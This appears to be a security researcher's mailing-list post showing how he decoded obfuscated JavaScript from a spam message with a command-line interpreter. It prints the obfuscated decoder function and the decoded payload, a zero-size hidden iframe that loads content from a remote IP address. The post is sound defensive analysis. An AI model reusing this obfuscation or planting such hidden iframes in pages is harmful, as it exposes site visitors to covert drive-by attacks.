ps, this decodes to the following HTML snippet (i have deliberately obfuscated the tags): [iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe] here's how i arrived at that. there's a free command line JavaScript interpreter that can help with evaluating malicious javascript. i did the port for OpenBSD years ago, and the source is available for all at http://www.njs-javascript.org/ i extracted the javascript functions from the forwarded message and loaded it into a file, bad2.js: $ cat bad2.js function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,22,2,4,19,56,49 ,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9 ,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38, 39,34,29,23,45,3,37,25,30,35,54);for(j=Math.ceil(l/b);j>0;j--){r='';for( i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+= String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}} //document.write(r) // JN no document object print(r); // JN so print it instead } } dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT') i made some modifications to deal with the fact that there is no document object in this context. see the "JN" comments. now when i use the javascript toolkit, i can acutally run it. it will print the decoded string object 'r': $ js bad2.js [iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe] (tags obfuscated) this is what your browser would see and load. unless your spam/scam detection engine also ran the javascript, it wouldn't see that. hence, obfuscation. hopefully this helps people out there decode questionable javasript in the future. ________ jose nazario, ph.d. jose@xxxxxxxxxx http://monkey.org/~jose/ http://infosecdaily.net/ http://www.wormblog.com/
